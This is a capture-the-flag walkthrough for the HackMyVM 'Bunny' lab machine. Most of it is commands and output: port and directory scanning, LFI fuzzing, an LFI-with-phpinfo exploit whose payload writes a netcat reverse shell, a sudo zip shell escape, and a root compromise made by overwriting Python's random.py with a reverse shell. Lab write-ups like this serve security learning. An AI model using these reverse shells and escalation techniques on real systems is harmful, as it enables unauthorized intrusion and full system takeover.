https://hackmyvm.eu/machines/machine.php?vm=Bunny
~ nmap -sV -sC -p- 192.168.56.100 -oN ports.log
...
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
80/tcp open http Apache httpd 2.4.38 ((Debian))
|_http-server-header: Apache/2.4.38 (Debian)
|_http-title: Site doesn't have a title (text/html; charset=UTF-8).
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Scan dirs.
~ gobuster dir -u http://192.168.56.100 -t 50 -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt -x .html,.php,.txt,.php.bak,.bak,.zip -b 401,4
03,404,500 --wildcard -o 80.log
===============================================================
/upload.php (Status: 200) [Size: 27305]
/password.txt (Status: 200) [Size: 537]
/index.php (Status: 200) [Size: 25]
/config.php (Status: 200) [Size: 24691]
/phpinfo.php (Status: 200) [Size: 95622]
After checking all files, nothing interesting. Next fuzz if index.php get some params.
~ wfuzz -u 'http://192.168.56.100/index.php?FUZZ=/etc/passwd' --hh 25 -w /usr/share/wordlists/seclists/Discovery/Web-Content/big.txt
=====================================================================
ID Response Lines Word Chars Payload
=====================================================================
000013357: 200 31 L 43 W 1508 Ch "page"
Fuzz local files, but found nothing useful.
~ wfuzz -u 'http://192.168.56.100/index.php?page=FUZZ' --hh 25 -w /usr/share/wordlists/seclists/Fuzzing/LFI/LFI-gracefulsecurity-linux.txt
=====================================================================
ID Response Lines Word Chars Payload
=====================================================================
000000001: 200 31 L 43 W 1508 Ch "/etc/passwd"
000000005: 200 231 L 1117 W 7249 Ch "/etc/apache2/apache2.conf"
000000004: 200 17 L 42 W 426 Ch "/etc/anacrontab"
000000015: 200 26 L 192 W 1067 Ch "/etc/crontab"
...
Now we get an php file with LFI, and phpinfo file whose file_uploads is on. It's a famous vulnerability.
Download poc from https://raw.githubusercontent.com/vulhub/vulhub/master/php/inclusion/exp.py and modify payload code.
PAYLOAD="""%s\r$
9 <?php file_put_contents('/tmp/g', '<?php system("nc 192.168.56.150 1234 -e /bin/bash"); ?>')?>\r""" % TAG$
Run poc, now shell has been uploaded to /tmp/g.
~ (p2) python exp.py 192.168.56.100 80 vim-0 | 0 [13:38:55]
LFI With PHPInfo()
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
Getting initial offset... found [tmp_name] at 137073
Spawning worker pool (10)...
51 / 1000
Got it! Shell created in /tmp/g
Woot! \m/
Shuttin' down...
Listen to port 1234 and runs the /tmp/g through LFI.
~ curl 'http://192.168.56.100/index.php?page=/tmp/g'
────────────────────────────────────────────────────────────────────────────────────────────────────────
~ nc -nlvp 1234
Ncat: Version 7.91 ( https://nmap.org/ncat )
Ncat: Listening on :::1234
Ncat: Listening on 0.0.0.0:1234
Ncat: Connection from 192.168.56.100.
Ncat: Connection from 192.168.56.100:49970.
id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
Next, we found user chris and a file named magic.
www-data@bunny:/home/chris/lab$ sudo -l
sudo -l
Matching Defaults entries for www-data on bunny:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin
User www-data may run the following commands on bunny:
(chris) NOPASSWD: /bin/bash /home/chris/lab/magic *
www-data@bunny:/home/chris/lab$ cat magic
cat magic
#/bin/bash
$1 $2 $3 -T -TT 'sh #'
www-data@bunny:/home/chris/lab$
Check online notes from https://gtfobins.github.io/gtfobins/zip/, we see zip can spawn a shell use the cmd in magic file.
Shell
It can be used to break out from restricted environments by spawning an interactive system shell.
TF=$(mktemp -u)
zip $TF /etc/hosts -T -TT 'sh #'
rm $TF
Escalate to user chris.
www-data@bunny:/home/chris/lab$ sudo -u chris /bin/bash /home/chris/lab/magic zip $(mktemp -u) /etc/hosts
<h /home/chris/lab/magic zip $(mktemp -u) /etc/hosts
adding: etc/hosts (deflated 30%)
$ id
id
uid=1000(chris) gid=1000(chris) groups=1000(chris),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),109(netdev),111(bluetooth)
Create /home/chris/.ssh, upload id_rsa.pub, rename to authorized_keys, chmod 600, then we can get ssh login.
Found writable file.
chris@bunny:~$ find / -writable -not -path "/proc*" 2>/dev/null
/home/chris
...
/usr/lib/python3.7/random.py
/tmp
...
Found /opt/pendu.py which imports random.py.
chris@bunny:~$ cd /opt
chris@bunny:/opt$ ls -la
total 12
drwxr-x--- 2 root chris 4096 juil. 31 10:25 .
drwxr-xr-x 18 root root 4096 juil. 31 09:00 ..
-rw-r--r-- 1 root root 1993 juil. 31 10:14 pendu.py
chris@bunny:/opt$ cat pendu.py
import random
...
Use pspy to check system calls.
2021/08/17 06:53:01 CMD: UID=0 PID=1236 | /bin/sh -c /usr/bin/python3.7 /opt/pendu.py
Write python reverse shell code into random.py, and wait for the final root shell.
chris@bunny:~$ echo 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.56.150",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/bash","-i"]);' > /usr/lib/python3.7/random.py
chris@bunny:~$
────────────────────────────────────────────────────────────────────────────────────────────────────────
~ nc -nlvp 1234
Ncat: Version 7.91 ( https://nmap.org/ncat )
Ncat: Listening on :::1234
Ncat: Listening on 0.0.0.0:1234
Ncat: Connection from 192.168.56.100.
Ncat: Connection from 192.168.56.100:49976.
bash: impossible de régler le groupe de processus du terminal (1259): Ioctl() inapproprié pour un périphérique
bash: pas de contrôle de tâche dans ce shell
root@bunny:~# id;hostname;
id;hostname;
uid=0(root) gid=0(root) groupes=0(root)
bunny
root@bunny:~#
